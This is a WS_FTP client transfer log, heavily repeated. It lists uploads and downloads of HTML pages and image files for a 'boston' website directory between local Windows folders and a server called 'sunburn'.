10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
